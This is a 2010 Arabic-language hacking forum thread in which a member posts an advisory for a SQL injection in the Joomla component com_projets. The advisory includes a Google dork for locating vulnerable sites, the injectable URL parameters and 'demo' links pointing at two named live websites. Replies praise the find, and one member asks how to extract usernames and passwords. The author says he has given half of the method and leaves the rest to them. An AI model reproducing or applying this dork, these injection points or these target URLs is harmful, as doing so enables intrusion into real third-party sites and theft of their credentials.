Joomla Component (com_projets) SQL Injection Vulnerability - منتدى أمن الإسلام | لا اله الا الله محمد رسول الله | IS-SEC.ORG | Dz-SeC Team |

BrOx-Dz · 30/11/2010, 13:05

بسم الله الرحمان الرحيم

اليوم نزلت ثغرة جديدة بسكريبت جوملا المشهور قبل ماتنزل بمواقع سكيوريتي

كود بلغة HTML:

==========================================================
Joomla Component (com_projets) SQL Injection Vulnerability
==========================================================

#######################################################################
# Exploit Title:Joomla Component (com_projets) SQL Injection Vulnerability #
# Author:By BrOx-Dz #
# Google Dork: inurl:com_projets #
# date:30/11/2010 #
# Tested on : xp b3 ubuntu 10 #
# mail: [] #
# home : algerie // free gaza
#######################################################################

Description for component :

This Jomponent Joomla (com_programas) And Infected Injection Sql Blind

and sql injection

=======================================================================

Exploit :

http://Site/index.php?option=com_projets&task=FicheProjet&id_projet=***91;SQL***93;
or
http://site/index.php?option=com_projets&func=viewprojet&catid=***91;SQL***93;

=======================================================================

Demo :

http://www.elfal.ma/index.php?option=com_projets&func=viewprojet&catid=13***91;SQL***93;&Itemid=13

http://www.strata.ch/index.php?option=com_projets&task=view&id=42g&type=1&Itemid=88***91;SQL***93;

=======================================================================


##############################################################
Greetz @ kader11000,Lagripe-Dz,MCA-CRB,All"MusliM"

and membre h4kz.net // dz4all.com // dzhacker.net

la ilaha ila lah
#############################################################

القادم احلى ثغرة بدهووك فورم

**ViRuS_Ra3cH** · 30/11/2010, 13:09

بارك الله فيك **** على الاهداء......

BrOx-Dz · 30/11/2010, 13:18

اقتباس:

ra3ch يقول

بارك الله فيك **** على الاهداء......

وفيك بركة اخى ra3ch

~~Gulussa~~ · 30/11/2010, 14:19

يعطيك الف عااافية اخي الغالي
ثغرة رائعة
يسلمك ربي

X_AviaTique_X · 30/11/2010, 14:22

بارك الله فيك، لكن ما فهمت الاستغلال ،
ممكن الاستغلال الكامل لجلب كل البيانات [يوزر وباس]
و**** على الاهداء ...

BrOx-Dz · 30/11/2010, 14:28

اقتباس:

md5 يقول

بارك الله فيك، لكن ما فهمت الاستغلال ،
ممكن الاستغلال الكامل لجلب كل البيانات [يوزر وباس]
و**** على الاهداء ...

وفيك بركة

انا اعطيتك 50/100 اكمل الباقى

BrOx-Dz · 30/11/2010, 14:28

اقتباس:

Gulussa يقول

يعطيك الف عااافية اخي الغالي
ثغرة رائعة
يسلمك ربي

الله يعافيك

mS_Dz · 08/05/2011, 18:50

مشكور خويا بو بكر

Cmtr-Dz · 22/05/2011, 19:18

الله يبارك فيك خيو الي الأمام

9lbi hacker · 16/06/2011, 15:55

اقتباس:

مشكور اخوي . ممكن اطلــبكم ؟
ابي دوره بـ التخميــن بلـيـز ...

إخوك .. صلبي هكر ..

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
انواع عرض الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
Joomla Component com_gr SQL Injection Vulnerability	GHOS7	[ Section Française ]	2	27/10/2012 16:40
Joomla JE Job Component SQL injection Vulnerability	ViRuS_Ra3cH	[ منتدى الثغرات & أكتشافات الاعضاء ]	3	07/08/2012 23:31
[webapps / 0day] - Joomla Component (com_projets) SQL Injection Vulnerability	ADMINISTRATOR	قسم الثغرات	0	30/11/2010 16:41
Joomla Component (com_clan) SQL Injection Vulnerability	ViRuS_Ra3cH	[ منتدى الثغرات & أكتشافات الاعضاء ]	0	09/11/2010 16:29
Joomla Component com_arash SQL Injection Vulnerability	Dz_V!rUs	[ منتدى الثغرات & أكتشافات الاعضاء ]	0	06/09/2010 12:42

حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)